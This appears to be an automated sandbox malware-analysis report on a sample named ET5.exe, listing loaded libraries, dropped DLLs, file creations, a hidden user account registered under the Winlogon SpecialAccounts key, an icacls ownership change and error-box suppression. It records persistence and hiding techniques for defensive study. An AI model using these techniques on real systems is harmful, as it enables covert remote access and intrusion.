Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ET5.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ET5.exe Static file information: File size 17157120 > 1048576
Source: ET5.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc32a00
Source: ET5.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1eb200
Source: ET5.exe Static PE information: More than 200 imports for user32.dll
Source: Binary string: RfxVmt.pdb source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: rfxvmt.dll.22.dr Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe Code function: 11_2_00007FF70489FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,11_2_00007FF70489FF1F
Source: ET5.exe Static PE information: section name: .didata
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe.2.dr Static PE information: section name: .xdata
Source: hstmhco83f64lehv4q0wbzqj3o.exe.2.dr Static PE information: section name: .xdata
Source: main.exe.10.dr Static PE information: section name: .xdata
Source: cnccli.dll.22.dr Static PE information: section name: .xdata
Source: libi2p.dll.22.dr Static PE information: section name: .xdata
Source: evtsrv.dll.22.dr Static PE information: section name: .xdata
Source: termsrv32.dll.22.dr Static PE information: section name: .xdata
Source: rdpctl.dll.22.dr Static PE information: section name: .xdata
Source: samctl.dll.22.dr Static PE information: section name: .xdata
Source: prgmgr.dll.22.dr Static PE information: section name: .xdata
Source: dwlmgr.dll.22.dr Static PE information: section name: .xdata
Source: rVtDGbMQ.22.dr Static PE information: section name: .xdata
Source: gBXHuZY0.22.dr Static PE information: section name: .xdata
Source: 3rVpJMV7.22.dr Static PE information: section name: .xdata
Source: L0FsI2PI.22.dr Static PE information: section name: .xdata
Source: y8J74cEH.22.dr Static PE information: section name: .xdata
Source: rmcjgYnL.22.dr Static PE information: section name: .xdata
Source: fYg6Jeg5.22.dr Static PE information: section name: .xdata
Source: ypqwg32t.22.dr Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\ET5.exe Code function: 0_2_037AF262 push es; retf 0_2_037AF263
Source: C:\Users\user\Desktop\ET5.exe Code function: 0_2_0379124F push ecx; retf 0_2_03791252
Source: C:\Users\user\Desktop\ET5.exe Code function: 0_2_03796761 push esi; ret 0_2_03796763
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,22_2_00007FF8B915521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\L0FsI2PI
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\rVtDGbMQ
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\gBXHuZY0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\user\Desktop\ET5.exe File created: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\user\Desktop\ET5.exe File created: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\erT926ze
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\rmcjgYnL
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\y8J74cEH
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\ypqwg32t
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\fYg6Jeg5
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\3rVpJMV7
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF708878C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF708878C4A
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: samctl.dll.22.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: samctl.dll.22.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.10.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.10.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe; Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\ET5.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
